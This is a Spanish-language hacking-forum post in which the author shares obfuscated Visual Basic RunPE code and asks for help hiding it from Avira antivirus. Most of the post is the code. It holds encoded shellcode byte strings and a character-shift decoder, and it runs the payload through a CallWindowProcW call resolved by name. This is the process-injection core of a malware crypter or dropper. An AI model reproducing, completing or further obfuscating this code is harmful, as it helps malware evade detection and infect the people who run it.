por Naker90 VIP
Hola Indetectables, bueno en mi lucha contra el Avira y su Dropper de los huevos he llegado hasta aqui. Quite la API del CallWindowsProcW con la ayuda del post de Lucho y me quede que el avira detecta esto:

MOMomomoM VarPtr(FeKu0flX5(0)), StrPtr(AAABBBBccccDDD1), VarPtr(THv2YiUoo(0)), 0, 0

RunPe:

Código: Seleccionar todo

Dim ObEBPmR0L          As Integer
Private XhIdIZQk7(7)                   As String
Dim gy0bMAzUI                     As Long
Dim rhAmWHlhM                            As Long
Dim pwka6sCnw                As Long
Private FeKu0flX5(1287)                                  As Byte
Dim PPPpppPPP           As Integer
Dim QQQqqqqQQQq As New asdcdc

Public Sub HJFG6Al5J(ByVal STPCKgHor As String, THv2YiUoo() As Byte)
XhIdIZQk7(0) = TaUBb5pA4("RSb<6RSbK>RSb:KRSb66RSb66RSb66RSb<HRSb66RSb<;RSb66RSb=8RSb66RSb<KRSb66RSb<;RSb66RSb<IRSb66RSb99RSb66RSb98RSb66RSb66RSb66RSb<KRSb66RSb=:RSb66RSb<:RSb66RSb<IRSb66RSb<IRSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb66RSb;HRSb>HRSbLIRSb<GRSb:8RSbK>RSbHHRSb69RSb66RSb66RSb>HRSb;:RSb8:RSb8>RSb>?RSb77RSb>HRSb;:RSb8:RSb8IRSb<GRSb9KRSbK>RSbGGRSb69RSb66RSb66RSb>?RSb77RSb<GRSb:GRSbK>RSbG7RSb69RSb66RSb66RSb>?RSb9?RSb<GRSb7KRSb<GRSb9IRSbK>RSb?JRSb69RSb66RSb66RSb<GRSb88RSb<>RSbL:RSb66RSb66RSb66RSbK>RSb?7RSb69RSb66RSb66RSb<GRSb8<RSb<GRSb8:RSbK>RSb>>RSb69RSb66RSb66RSb<GRSb8GRSb<GRSb:6RSbK>RSb=LRSb69RSb66RSb66", "6")
XhIdIZQk7(1) = TaUBb5pA4("TUd>ITUd:MTUd>ITUd8KTUdM@TUd?>TUd8;TUd88TUd88TUd>ITUd;:TUd>@TUdK@TUd88TUd88TUd88TUdM@TUd>ITUd8;TUd88TUd88TUd>ITUd:ITUdM@TUd=KTUd8;TUd88TUd88TUd@JTUd8ATUdK?TUd89TUd<<TUd88TUd88TUd88TUd>ITUd9:TUdM@TUd<LTUd8;TUd88TUd88TUd>@TUd=JTUdM@TUd9<TUdKNTUd=9TUdM@TUd?ATUd8;TUd88TUd88TUd>ITUd;MTUdM@TUd;JTUd8;TUd88TUd88TUd@JTUdL9TUd>ITUd9MTUdM@TUd;:TUd8;TUd88TUd88TUd>ITUd<8TUdNNTUd;:TUdNNTUd;9TUdNNTUdL8TUd>ITUd9:TUdM@TUd:;TUd8;TUd88TUd88TUd>@TUd=JTUdM@TUd9<TUdKNTUd=9TUdM@TUd<NTUd8;TUd88TUd88TUd>ITUd9MTUdM@TUd99TUd8;TUd88TUd88TUd@JTUd8ATUd@JTUd=9TUd;KTUd>ITUd;MTUdM@TUd8=TUd8;TUd88TUd88TUd@JTUd;ATUd8;TUdNITUd>ITUd::TUdM@TUdNITUd8:TUd88TUd88TUd@JTUd8ATUd>@TUdN@TUd88TUd88TUd88TUd=?TUd=9TUdNNTUdL8TUd>ITUd88TUdM@TUdM@TUd8:TUd88TUd88TUd>@TUd@@TUdNMTUdJ;TUd9>TUd=9TUdM@TUd9<TUd8;TUd88TUd88TUd>ITUd:MTUdM@TUdL>TUd8:TUd88", "8")
XhIdIZQk7(2) = TaUBb5pA4("STc77STc?ISTc:@STc=HSTc9HSTcL?STcJKSTc79STc77STc77STc?ISTc88STc=HSTc;9STcL?STcJ;STc79STc77STc77STc<>STc<9STc=HSTc77STc=HSTc77STc=HSTc7;STc=HSTc77STc=HSTc77STc=HSTc77STc=HSTc77STcMMSTc:8STcMMSTcK7STc=HSTc89STcL?STcH@STc79STc77STc77STc=?STcK7STc:>STc87STcM9STc<8STcL?STcK<STc79STc77STc77STc=HSTc99STcL?STc@>STc79STc77STc77STc?ISTc88STc=HSTc9LSTcL?STc?LSTc79STc77STc77STc?ISTc7@STcMMSTc>9STc:;STcMMSTc:8STcMMSTcK7STc=HSTc77STcL?STc>LSTc79STc77STc77STc=?STc@JSTc@<STc8HSTc=LSTc<8STcL?STcHHSTc79STc77STc77STc=HSTc99STcL?STc=JSTc79STc77STc77STc?ISTc88STc?ISTc:@STc=HSTc9LSTcL?STc=8STc79STc77STc77STc?ISTc7@STc=HSTc;7STc=?STc77STc:7STc77STc77STcMMSTc>9STc<7STcMMSTc>>STc:;STcMMSTc:8STcMMSTcK7STc=HSTc:=STcL?STc;>STc79STc77STc77STc?ISTcK8STc=HSTc99STcL?STc:LSTc79STc77STc77STc?ISTc:@STc=HSTc:LSTcL?STc:<STc79STc77", "7")
XhIdIZQk7(3) = TaUBb5pA4("OP_33OP_;EOP_64OP_9DOP_55OP_H;OP_5FOP_35OP_33OP_33OP_;EOP_34OP_9DOP_5HOP_H;OP_56OP_35OP_33OP_33OP_;EOP_3<OP_85OP_IIOP_::OP_87OP_89OP_IIOP_:3OP_67OP_IIOP_64OP_9DOP_33OP_H;OP_43OP_35OP_33OP_33OP_9;OP_D4OP_9DOP_6GOP_G;OP_84OP_H;OP_6FOP_35OP_33OP_33OP_;6OP_F7OP_3FOP_IIOP_G3OP_9DOP_45OP_H;OP_I<OP_34OP_33OP_33OP_9;OP_8EOP_H;OP_47OP_FIOP_84OP_H;OP_58OP_35OP_33OP_33OP_9DOP_55OP_H;OP_H:OP_34OP_33OP_33OP_;EOP_44OP_;6OP_F5OP_39OP_9DOP_6DOP_H;OP_GEOP_34OP_33OP_33OP_9DOP_35OP_85OP_84OP_IIOP_G3OP_9DOP_69OP_H;OP_FHOP_34OP_33OP_33OP_F:OP_34OP_33OP_33OP_33OP_33OP_E;OP_5;OP_33OP_33OP_33OP_9DOP_69OP_H;OP_EFOP_34OP_33OP_33OP_I:OP_54OP_9DOP_4HOP_H;OP_E6OP_34OP_33OP_33OP_;EOP_44OP_;EOP_85OP_6FOP_;4OP_F5OP_I;OP_33OP_33OP_33OP_36OP_G3OP_9DOP_6HOP_H;OP_<IOP_34OP_33OP_33OP_36OP_44OP_9DOP_59OP_H;OP_<9OP_34OP_33OP_33OP_9D", "3")
XhIdIZQk7(4) = TaUBb5pA4("TUd:@TUd=:TUdNNTUd;9TUd>ITUd9:TUdM@TUd@ITUd89TUd88TUd88TUd>@TUd=JTUdM@TUd9<TUdKNTUd=9TUdM@TUdJ>TUd89TUd88TUd88TUd@;TUdK<TUd8KTUdNNTUdL8TUd>ITUd:>TUdM@TUd?;TUd89TUd88TUd88TUd@JTUd;ATUd@JTUd8ATUd@JTUd?9TUd9<TUd>ITUd;MTUdM@TUd>=TUd89TUd88TUd88TUd8;TUd;9TUd>ITUd:>TUdM@TUd=KTUd89TUd88TUd88TUd@JTUd8ATUd@JTUd=9TUd8KTUd>ITUd::TUdM@TUd=8TUd89TUd88TUd88TUd@JTUd8ATUd8;TUd=9TUd;<TUd>ITUd<>TUdM@TUd<<TUd89TUd88TUd88TUd@JTUdK9TUd>ITUd:MTUdM@TUd;JTUd89TUd88TUd88TUd@JTUd8ATUd=8TUdNNTUd??TUd98TUd=>TUd=:TUdNNTUd;9TUd>ITUd88TUdM@TUd:ITUd89TUd88TUd88TUd>@TUdI9TUd>ITUd;LTUdL@TUd=9TUdM@TUd=>TUd89TUd88TUd88TUd@;TUdK<TUd8KTUdNNTUdL8TUd>ITUd;>TUdM@TUd9;TUd89TUd88TUd88TUd@JTUd99TUd@;TUdK:TUd89TUd@ATUd99TUd>ITUd;ITUdM@TUd8=TUd89TUd88TUd88TUd@JTUd8ATUd;JTUdKITUd8NTUd@=TUd;;TUdNNTUdNNTUdNNTUd>ITUd;:TUdM@TUdN<TUd88TUd88TUd88", "8")
XhIdIZQk7(5) = TaUBb5pA4("NO^:DNO^2;NO^E9NO^23NO^29NO^22NO^23NO^22NO^8CNO^22NO^G:NO^G7NO^22NO^22NO^22NO^8:NO^F4NO^E9NO^C9NO^8:NO^73NO^G:NO^33NO^23NO^22NO^22NO^8CNO^54NO^G:NO^F5NO^22NO^22NO^22NO^:DNO^33NO^8CNO^4GNO^G:NO^ECNO^22NO^22NO^22NO^:DNO^2;NO^74NO^HHNO^93NO^26NO^HHNO^F2NO^8CNO^44NO^G:NO^DDNO^22NO^22NO^22NO^:DNO^5;NO^:5NO^E9NO^56NO^8CNO^54NO^G:NO^CHNO^22NO^22NO^22NO^:DNO^53NO^:DNO^D8NO^C6NO^22NO^22NO^22NO^:5NO^E8NO^2:NO^8CNO^4GNO^G:NO^;FNO^22NO^22NO^22NO^:DNO^33NO^8CNO^68NO^G:NO^;6NO^22NO^22NO^22NO^73NO^8CNO^26NO^79NO^78NO^HHNO^54NO^8CNO^22NO^G:NO^:8NO^22NO^22NO^22NO^8:NO^C3NO^8CNO^5FNO^F:NO^73NO^G:NO^D4NO^22NO^22NO^22NO^:5NO^E6NO^2ENO^HHNO^F2NO^8CNO^44NO^G:NO^8HNO^22NO^22NO^22NO^:DNO^2;NO^:DNO^73NO^4:NO^25NO^73NO^56NO^8CNO^54NO^G:NO^82NO^22NO^22NO^22NO^:DNO^2;NO^:3NO^E3NO^D2NO^22NO^22NO^22NO^:;NO^33NO^8CNO^22NO^G:", "2")
XhIdIZQk7(6) = TaUBb5pA4("NO^6HNO^22NO^22NO^22NO^8:NO^F5NO^E9NO^C9NO^G:NO^73NO^G:NO^9DNO^22NO^22NO^22NO^8CNO^54NO^G:NO^5FNO^22NO^22NO^22NO^:DNO^F3NO^8CNO^4GNO^G:NO^56NO^22NO^22NO^22NO^:DNO^2;NO^HHNO^54NO^HHNO^93NO^26NO^HHNO^F2NO^8CNO^22NO^G:NO^46NO^22NO^22NO^22NO^8:NO^::NO^5HNO^6CNO^;GNO^73NO^G:NO^72NO^22NO^22NO^22NO^8CNO^4GNO^G:NO^34NO^22NO^22NO^22NO^:DNO^2;NO^HHNO^93NO^26NO^HHNO^F2NO^8CNO^6CNO^G:NO^26NO^22NO^22NO^22NO^:DNO^43NO^83NO^E5NO^:DNO^EDNO^25NO^6ENO^46NO^26NO^E5NO^8CNO^22NO^G:NO^H4NO^HHNO^HHNO^HHNO^8:NO^76NO^ECNO^CHNO^;3NO^73NO^G:NO^3GNO^22NO^22NO^22NO^8CNO^62NO^8:NO^22NO^32NO^22NO^22NO^HHNO^96NO^46NO^3:NO^8CNO^22NO^HHNO^F2NO^HHNO^96NO^46NO^36NO^G:NO^EHNO^HHNO^HHNO^HHNO^:;NO^23NO^:5NO^E6NO^32NO^E5NO^G:NO^44NO^22NO^22NO^22NO^8:NO^C6NO^6GNO^2GNO^GENO^72NO^G:NO^6DNO^22NO^22NO^22NO^:5NO^E6NO^2:NO^HHNO^96NO^46NO^26", "2")
XhIdIZQk7(7) = TaUBb5pA4("STcMMSTcK7STcMMSTc>;STc9;STc7?STc<7STcL?STc:?STc77STc77STc77STc?:STcJ;STc7?STcJ:STc<<STc<9STc<8STc<:STc<=STc<>STc::STcJ7STc=;STc?ISTc>7STc:7STc?ISTc>=STc7JSTc?ISTc>=STc8JSTc?ISTc=LSTc7?STc?ISTc>LSTc97STc?ISTc:=STc:?STc;>STc8?STc><STcM:STc?7STc:MSTc=ISTc>;STc7>STc?7STc:MSTc;ISTc>;STc79STcLISTcL>STc?ISTcJ<STc<MSTc<LSTc<ISTc<@STc<HSTc<KSTcJ:STc<<STc<9STc<8STc<:STc<=STc<>STc?ISTc=JSTc9;STc8JSTc?<STcLKSTc>;STc;:STc?ISTc;<STc:JSTc?ISTc<;STc9?STc>?STc7:STcK<STc?ISTc;HSTc8?STc?ISTc<HSTc97STc7:STcKKSTcL:STc:7STc;@STc?ISTc:;STc?ISTc7:STcM<STc::STcMMSTc::STcJ7STcMJSTcHJSTc?;STcJ7STc>;STc7>STcJ8STcJMSTc7KSTc7:STcM?STcLISTcM;STc:ISTc>JSTc9;STc97STc><STcL8STc?ISTc<HSTc9;STc7:STcKKSTc==STc?ISTc7JSTc;ISTc?ISTc<HSTc8JSTc7:STcKKSTc?ISTc7;STc?ISTc7:STcJ<STc<MSTc<LSTc<ISTc<@STc<HSTc<KSTcJ:STcJ:STc77STc77STc77STc77", "7")
For gy0bMAzUI = 0 To 7
For rhAmWHlhM = 1 To 805 Step 5
FeKu0flX5(pwka6sCnw) = Replace(Mid(XhIdIZQk7(gy0bMAzUI), rhAmWHlhM, 5), TaUBb5pA4("TUd", "8"), Chr(Val(TaUBb5pA4(";@", "8"))) & Chr(Val(TaUBb5pA4("@;", "9")))): pwka6sCnw = pwka6sCnw + 1
Next rhAmWHlhM
Next gy0bMAzUI
Dim AAABBBBccccDDD1 As String
AAABBBBccccDDD1 = STPCKgHor
MOMomomoM VarPtr(FeKu0flX5(0)), StrPtr(AAABBBBccccDDD1), VarPtr(THv2YiUoo(0)), 0, 0 
End Sub

Public Function TaUBb5pA4(YWYce09KC As String, sq2H54bhy As Integer)
For ObEBPmR0L = 1 To Len(YWYce09KC)
Mid(YWYce09KC, ObEBPmR0L, 1) = Chr(Asc(Mid(YWYce09KC, ObEBPmR0L, 1)) - sq2H54bhy)
Next ObEBPmR0L
TaUBb5pA4 = YWYce09KC
End Function
Public Function MOMomomoM(ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
MOMomomoM = QQQqqqqQQQq.TTTtttTTT(RRRrrrRRR("][MZ;:", "8"), RRRrrrRRR("FdooZlqgrzSurfZ", "3"), lpPrevWndFunc, hWnd, Msg, wParam, lParam)
End Function

Public Function RRRrrrRRR(strInput As String, second As Integer)
For PPPpppPPP = 1 To Len(strInput)
Mid(strInput, PPPpppPPP, 1) = Chr(Asc(Mid(strInput, PPPpppPPP, 1)) - second)
Next PPPpppPPP
RRRrrrRRR = strInput
End Function
Alguna idea de como ofuscarlo, porque me quede sin ideas.
Saludos Bros
Skype: naker.noventa
Temas similares
Desofuscar codigo javascript por JoseManuel en Dudas y Preguntas
Links sobre el tema
Variantes de tema
Responder

Volver a “VB/.NET”